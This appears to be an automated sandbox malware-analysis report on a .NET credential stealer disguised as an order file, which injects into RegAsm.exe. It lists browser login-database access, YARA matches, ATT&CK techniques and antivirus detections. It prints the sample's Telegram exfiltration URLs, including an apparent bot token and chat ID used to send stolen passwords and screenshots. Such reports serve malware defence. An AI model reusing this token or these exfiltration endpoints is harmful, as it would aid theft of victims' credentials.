                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\=m
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 'm
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL@9
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4rB
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|~r
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|>6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,?p
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXX<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q40Q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<@Y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4Po
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpgx
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@(6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|`I
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdr4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@HT
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHX\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q, >
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@hr
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q89J
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhVy
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8Yh
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPG}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD1/
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPi[
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`i;
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDF
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0(V
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdd
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh7G
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qto
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtn5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<_9
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q||}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTMN
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTml
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|<A
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qF;
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4,g
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHw<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXVG
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0h@
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`eQ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXve
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,_Y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$oo
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q85`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP#u
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0G6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\]V
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0gT
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8w\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXuy
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`$^
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(xh
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd-E
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`gF
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q %x
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$P=
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL^b
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDp8
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,={
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<a.
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qToa
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHy1
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4Nz
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4pX
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(XJ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL1}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD#5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,U>
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q>g
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDCS
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql2F
                Source: C:\Users\user\Desktop\JB#40044 Order.exeQueries volume information: C:\Users\user\Desktop\JB#40044 Order.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                13
                System Information Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                1
                Security Software Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager2
                Process Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Timestomp
                NTDS31
                Virtualization/Sandbox Evasion
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Application Window Discovery
                SSH1
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                System Network Configuration Discovery
                VNC1
                Clipboard Data
                Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                JB#40044 Order.exe44%VirustotalBrowse
                JB#40044 Order.exe42%ReversingLabsByteCode-MSIL.Trojan.Heracles
                JB#40044 Order.exe100%AviraTR/Dropper.Gen
                JB#40044 Order.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://purl.oenN0%Avira URL Cloudsafe
                http://go.microsoft.ce0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.210.172
                truefalse
                  high
                  reallyfreegeoip.org
                  104.21.112.1
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      217.20.57.25
                      truefalse
                        high
                        checkip.dyndns.com
                        132.226.247.73
                        truefalse
                          high
                          checkip.dyndns.org
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://checkip.dyndns.org/false
                              high
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                high
                                https://api.telegram.org/bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20Passwords%20/%208.46.123.189false
                                  high
                                  https://api.telegram.org/bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO==========false
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://api.telegram.org/bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgRegAsm.exe, 00000001.00000002.4093830575.000000000325A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botRegAsm.exe, 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.org/aTRegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.org/qJB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              http://go.microsoft.cRegAsm.exe, 00000001.00000002.4093095692.0000000001591000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://purl.oenNRegAsm.exe, 00000001.00000002.4101115316.0000000008D40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://checkip.dyndns.orgRegAsm.exe, 00000001.00000002.4093830575.000000000325A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://go.microsoft.ceRegAsm.exe, 00000001.00000002.4093095692.0000000001591000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot-/sendDocument?chat_id=JB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      high
